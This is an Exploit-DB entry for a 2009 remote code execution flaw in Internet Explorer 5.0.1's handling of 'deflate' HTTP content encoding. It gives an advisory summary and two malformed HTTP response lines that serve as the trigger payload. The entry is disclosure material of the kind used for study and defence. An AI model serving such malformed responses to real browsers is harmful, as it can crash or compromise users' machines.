Microsoft Internet Explorer 5.0.1 - 'deflate' HTTP Content Encoding Remote Code Execution

EDB-ID:

33270


Author:

Skylined

Type:

remote


Platform:

Windows

Date:

2009-10-13


source: https://www.securityfocus.com/bid/36622/info

Microsoft Internet Explorer is prone to a remote code-execution vulnerability.

Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer. Failed attacks may cause denial-of-service conditions. 

HTTP/.\nContent-Encoding:deflate\r\t\n\r\n\x20\x20

HTTP \nContent-Encoding:deflate\nContent-Range:\n\n”